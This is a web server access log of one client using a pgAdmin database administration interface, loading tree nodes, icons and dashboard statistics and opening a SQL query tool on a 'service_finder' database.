200 200 - GET https db.profibot.hu "/browser/server/static/img/pg.svg?ver=91100" [Client 84.1.26.27] [Length 1625] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/server_group/nodes/" [Client 84.1.26.27] [Length 242] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/children/1/2" [Client 84.1.26.27] [Length 232] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/static/img/coll-database.svg?ver=91100" [Client 84.1.26.27] [Length 1050] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/tablespace/static/img/coll-tablespace.svg?ver=91100" [Client 84.1.26.27] [Length 534] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/role/nodes/1/2/" [Client 84.1.26.27] [Length 461] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/role/static/img/coll-role.svg?ver=91100" [Client 84.1.26.27] [Length 1156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/nodes/1/2/" [Client 84.1.26.27] [Length 315] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/static/img/databasebad.svg?ver=91100" [Client 84.1.26.27] [Length 1156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/role/static/img/role.svg?ver=91100" [Client 84.1.26.27] [Length 667] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/static/img/database.svg?ver=91100" [Client 84.1.26.27] [Length 899] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/role/static/img/group.svg?ver=91100" [Client 84.1.26.27] [Length 1696] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/children/1/2/16384" [Client 84.1.26.27] [Length 435] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/event_trigger/static/img/coll-event_trigger.svg?ver=91100" [Client 84.1.26.27] [Length 711] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/nodes/1/2/16384/" [Client 84.1.26.27] [Length 476] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/cast/static/img/coll-cast.svg?ver=91100" [Client 84.1.26.27] [Length 1721] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/foreign_data_wrapper/static/img/coll-foreign_data_wrapper.svg?ver=91100" [Client 84.1.26.27] [Length 1403] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/extension/static/img/coll-extension.svg?ver=91100" [Client 84.1.26.27] [Length 1236] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/catalog/static/img/coll-catalog.svg?ver=91100" [Client 84.1.26.27] [Length 1163] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/publication/static/img/coll-publication.svg?ver=91100" [Client 84.1.26.27] [Length 1090] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/static/img/coll-schema.svg?ver=91100" [Client 84.1.26.27] [Length 1159] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/language/static/img/coll-language.svg?ver=91100" [Client 84.1.26.27] [Length 520] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/static/img/schema.svg?ver=91100" [Client 84.1.26.27] [Length 515] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/subscription/static/img/coll-subscription.svg?ver=91100" [Client 84.1.26.27] [Length 1154] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/children/1/2/16384/2200" [Client 84.1.26.27] [Length 621] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/children/1/2/16384/17561" [Client 84.1.26.27] [Length 624] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/aggregate/static/img/coll-aggregate.svg?ver=91100" [Client 84.1.26.27] [Length 1408] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/collation/static/img/coll-collation.svg?ver=91100" [Client 84.1.26.27] [Length 667] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/fts_configuration/static/img/coll-fts_configuration.svg?ver=91100" [Client 84.1.26.27] [Length 1922] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/procedure/static/img/coll-procedure.svg?ver=91100" [Client 84.1.26.27] [Length 4249] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/function/static/img/coll-function.svg?ver=91100" [Client 84.1.26.27] [Length 4534] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/fts_template/static/img/coll-fts_template.svg?ver=91100" [Client 84.1.26.27] [Length 583] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/fts_dictionary/static/img/coll-fts_dictionary.svg?ver=91100" [Client 84.1.26.27] [Length 805] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/table/nodes/1/2/16384/17561/" [Client 84.1.26.27] [Length 724] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/domain/static/img/coll-domain.svg?ver=91100" [Client 84.1.26.27] [Length 1266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/sequence/static/img/coll-sequence.svg?ver=91100" [Client 84.1.26.27] [Length 426] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/fts_parser/static/img/coll-fts_parser.svg?ver=91100" [Client 84.1.26.27] [Length 326] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/foreign_table/static/img/coll-foreign_table.svg?ver=91100" [Client 84.1.26.27] [Length 1585] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/operator/static/img/coll-operator.svg?ver=91100" [Client 84.1.26.27] [Length 875] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/mview/static/img/coll-mview.svg?ver=91100" [Client 84.1.26.27] [Length 790] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/trigger_function/static/img/coll-trigger_function.svg?ver=91100" [Client 84.1.26.27] [Length 4424] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/table/static/img/coll-table.svg?ver=91100" [Client 84.1.26.27] [Length 1258] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/type/static/img/coll-type.svg?ver=91100" [Client 84.1.26.27] [Length 691] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/view/static/img/coll-view.svg?ver=91100" [Client 84.1.26.27] [Length 504] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/table/static/img/table.svg?ver=91100" [Client 84.1.26.27] [Length 909] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:19 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:21 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:23 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:25 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:27 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:43 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:44 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_tree_state/" [Client 84.1.26.27] [Length 63] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:44 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tree_state/" [Client 84.1.26.27] [Length 429] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:45 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:47 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:48 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:49 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:50 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:50 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:51 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:53 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:53 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] 